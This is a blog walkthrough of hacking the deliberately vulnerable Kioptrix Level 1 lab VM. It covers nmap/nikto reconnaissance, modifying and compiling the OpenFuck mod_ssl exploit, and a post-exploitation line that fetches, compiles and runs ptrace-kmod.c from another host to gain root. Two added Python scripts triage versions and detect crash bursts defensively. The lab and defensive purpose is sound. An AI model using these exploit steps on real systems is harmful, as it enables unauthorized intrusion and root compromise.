Sunday, 12 August 2012

Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)



Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1. But what is Kioptrix? It's a Linux distro with lots of vulnerabilities, so we can play and test our knowledge. To download it, go to http://www.kioptrix.com/blog/?page_id=135, open the files with VMware Player, and you are ready to go.

So, now that everything is up and running, we need to discover the IP address of the target machine, because it gets one via DHCP from your network (by the way, you need a DHCP server for this to work). To find out the IP address, let's run an nmap scan on our network that looks for live hosts.

# nmap -sn 172.16.1.0/24
Nmap scan report for 172.16.1.144
Host is up (0.0010s latency).
MAC Address: 00:50:56:AF:5A:B9 (VMware)

Great, now that we have found the IP address, let's see what's running on the host.

# nmap -sV 172.16.1.144


Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-03 16:47 BST
Nmap scan report for 172.16.1.144
Host is up (0.033s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn          Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status (status V1)   1 (rpc #100024)
MAC Address: 00:50:56:AF:5A:B9 (VMware)


OK, at this point there is a lot to do. We need to find out whether the running version of each service on the open ports has a known exploit. To get the proper version and vulnerability ID, let's use nikto to scan the host. I am not going to explain all the vulnerabilities of the distro; I think two are good enough, and you can try other ways to break in yourselves. So I am going to show how to break in using Apache and Samba.
1) cd /pentest/web/nikto/
2) ./nikto.pl -host 172.16.1.144
3) The results (the interesting bits):
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
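The nmap and nikto output above is really a version-to-advisory comparison done by hand: nikto knows that Apache 1.3 below 1.3.27 and 1.3.29, and mod_ssl 2.8.7 and lower, have published issues. The script below is an added example (not part of the original post, not nikto's code) that does the same triage from the defender's side, parsing the nmap -sV lines shown above and checking each product version against the three thresholds nikto reported. The sample nmap lines are copied from the scan above; the parsing regexes, the advisory table layout and the function names are my own assumptions.

```python
import re

# Constructed sample input: the service lines from the nmap -sV scan shown above.
NMAP_OUTPUT = """\
22/tcp   open  ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn          Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
"""

# Version boundaries as reported by nikto above:
# (component, boundary version, is the boundary itself affected?, reference).
# "below 1.3.27" is exclusive; "2.8.7 and lower" is inclusive.
ADVISORIES = [
    ("Apache httpd", "1.3.27", False, "CAN-2002-0839 (OSVDB-4552)"),
    ("Apache httpd", "1.3.29", False, "CAN-2003-0542 (OSVDB-2733)"),
    ("mod_ssl", "2.8.7", True, "CVE-2002-0082 (OSVDB-756)"),
]

PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)\s+(?P<banner>.*)$"
)
# Two banner styles: "Apache httpd 1.3.20" (space separated) and "mod_ssl/2.8.4" (slash separated).
COMPONENT = re.compile(
    r"(?P<name>Apache httpd|OpenSSH|Samba smbd)\s+(?P<ver>\d[\w.]*)"
    r"|(?P<name2>mod_ssl|OpenSSL)/(?P<ver2>\d[\w.]*)"
)


def version_key(version):
    """Numeric comparison key: '1.3.20' -> (1, 3, 20). Letter suffixes ('0.9.6b') are ignored,
    so this is only precise enough for the purely numeric thresholds in ADVISORIES."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def is_affected(version, boundary, inclusive):
    """True if version is below the boundary (or equal to it when the advisory says 'and lower')."""
    v, b = version_key(version), version_key(boundary)
    return v < b or (inclusive and v == b)


def extract_components(banner):
    """Map each recognised product in an nmap version banner to its version string."""
    found = {}
    for m in COMPONENT.finditer(banner):
        name = m.group("name") or m.group("name2")
        found[name] = m.group("ver") or m.group("ver2")
    return found


def triage(nmap_text):
    """Return (port, component, version, reference) for every advisory a banner matches."""
    findings = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # headers, MAC address line, closed ports, etc.
        for name, ver in extract_components(m.group("banner")).items():
            for comp, boundary, inclusive, ref in ADVISORIES:
                if comp == name and is_affected(ver, boundary, inclusive):
                    findings.append((int(m.group("port")), name, ver, ref))
    return findings


if __name__ == "__main__":
    for port, name, ver, ref in triage(NMAP_OUTPUT):
        print(f"port {port}: {name} {ver} is affected by {ref}")
```

Ports 80 and 443 each produce three findings, which is exactly the set nikto printed. The useful part for a defender is the inclusive/exclusive flag: "below 1.3.27" and "2.8.7 and lower" describe different boundaries, and a triage script that treats them the same will either miss the boundary version or report a fixed one.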


Right, now we need to Google the CVEs, or you can search for the exploit on BackTrack itself.
Run:
/pentest/exploits/exploitdb/searchsploit  apache linux remote
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit  /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl   /linux/remote/38.pl
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit    /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit     /linux/remote/132.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)/linux/remote/764.c
Apache Tomcat Connector (mod_jk) Remote  Exploit (exec-shield)     /linux/remote/4162.c
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)     /linux/remote/4552.pl
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt


As you can see, there is one for OpenSSL (764.c), OpenFuck.
Now, because this is really old, you need to change the exploit a bit in order to make it work.
1) Add: #include <openssl/rc4.h>
2) Add: #include <openssl/md5.h>
3) Search inside the exploit for "wget" and change the URL to the correct one, because the original is not valid anymore. If you Google ptrace-kmod.c, you will find that the correct address is:
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
So just change that in the exploit and save it.
Now we need to compile it, but before that, we need to install the SSL development libraries.
Run:
apt-get install libssl-dev
cd /pentest/exploits/exploitdb/platforms/linux/remote
gcc -o OpenFuck 764.c -lcrypto
Run the exploit now:
./OpenFuck
Look for the target: we know that it's running Apache 1.3.20 on Red Hat, so let's filter for that:
./OpenFuck  | grep -i redhat | grep "1.3.20"
That limits the results to only two:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
So we can try target 0x6a first, and if that doesn't work, we can try 0x6b.
./OpenFuck 0x6a 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc3f0
Ready to send shellcode
Spawning shell...
Good Bye!

As you can see, that did not work.
Let's try the other one now.
./OpenFuck 0x6b 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f83c0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ wget http://172.16.1.79/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--09:18:29--  http://172.16.1.79/ptrace-kmod.c          => `ptrace-kmod.c'
Connecting to 172.16.1.79:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]    0K ...                   100% @   3.74 MB/s
09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 17426
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


Success!! We got root on the box.
In the next video I will demonstrate how to hack using Samba.
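Seen from the server, the two attempts above look very different: the 0x6a attempt ended in "Good Bye!" because the Apache child handling the connection crashed instead of running the shellcode, and only 0x6b produced a shell. Apache 1.3 records a crashed child in error_log as "[notice] child pid N exit signal Segmentation fault (11)", so a burst of such lines is the server-side trace of someone guessing return addresses against it. The script below is an added example for the defender (not part of the original post): it parses constructed error_log lines in that format and flags bursts of child crashes. The log lines, timestamps, window size and threshold are all constructed assumptions, not data from the Kioptrix box.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache 1.3-style error_log lines (made up for this example). Four crashes
# within a few seconds, then one isolated crash much later.
ERROR_LOG = """\
[Fri Aug  3 16:47:00 2012] [notice] Apache/1.3.20 (Unix) configured -- resuming normal operations
[Fri Aug  3 17:02:11 2012] [notice] child pid 17401 exit signal Segmentation fault (11)
[Fri Aug  3 17:02:12 2012] [notice] child pid 17403 exit signal Segmentation fault (11)
[Fri Aug  3 17:02:12 2012] [notice] child pid 17405 exit signal Segmentation fault (11)
[Fri Aug  3 17:02:13 2012] [notice] child pid 17407 exit signal Segmentation fault (11)
[Fri Aug  3 17:40:00 2012] [notice] child pid 17499 exit signal Segmentation fault (11)
"""

# Matches any child-exit-by-signal line, not only SIGSEGV, so bus errors etc. are caught too.
CRASH = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) "
    r"exit signal (?P<sig>[A-Za-z ]+) \((?P<num>\d+)\)"
)
TS_FORMAT = "%a %b %d %H:%M:%S %Y"  # Apache 1.3 timestamp, e.g. "Fri Aug  3 17:02:11 2012"


def parse_crashes(log_text):
    """Return (timestamp, pid, signal name) for each child-crash line, in file order."""
    crashes = []
    for line in log_text.splitlines():
        m = CRASH.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), TS_FORMAT)
            crashes.append((ts, int(m.group("pid")), m.group("sig")))
    return crashes


def detect_crash_bursts(log_text, window_seconds=60, threshold=3):
    """Group consecutive crashes that are no more than window_seconds apart and report
    every group with at least `threshold` crashes as (first_ts, last_ts, count)."""
    gap = timedelta(seconds=window_seconds)
    bursts, current = [], []
    for ts, _pid, _sig in parse_crashes(log_text):
        if current and ts - current[-1] > gap:
            bursts.append(current)  # previous burst ended
            current = []
        current.append(ts)
    if current:
        bursts.append(current)
    return [(b[0], b[-1], len(b)) for b in bursts if len(b) >= threshold]


if __name__ == "__main__":
    for first, last, count in detect_crash_bursts(ERROR_LOG):
        print(f"{count} child crashes between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

Two caveats for anyone wiring this into monitoring. First, the crash lines are logged at [notice] level, so a pipeline that only keeps [error] entries will never see them. Second, a burst of crashes only catches the misses; a guess that lands (the 0x6b run above) leaves no crash at all, and the next visible trace is the web server's own user running wget, gcc and a freshly built binary, which is a process-ancestry signal rather than a log-line one.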

2 comments:

  1. I get these errors when I try to compile it. I have added the headers to it and everything, but it seems like my amazing C experience isn't helping ^,^ ...

    764.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
    unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘read_ssl_packet’:
    764.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
    if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
    ^~~~~~~~~~~~~
    764.c:847:19: note: each undeclared identifier is reported only once for each function it appears in
    764.c: In function ‘get_server_hello’:
    764.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
    if (*(p++) != SSL2_MT_SERVER_HELLO) {
    ^~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_master_key’:
    764.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
    if (pkey->type != EVP_PKEY_RSA) {
    ^~
    764.c: In function ‘get_server_verify’:
    764.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_VERIFY) {
    ^~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_finished’:
    764.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
    buf[0] = SSL2_MT_CLIENT_FINISHED;
    ^~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘get_server_finished’:
    764.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_FINISHED) {

    Replies
    1. You need to install libssl1.0-dev: apt-get install libssl1.0-dev

      I had the same issue!!
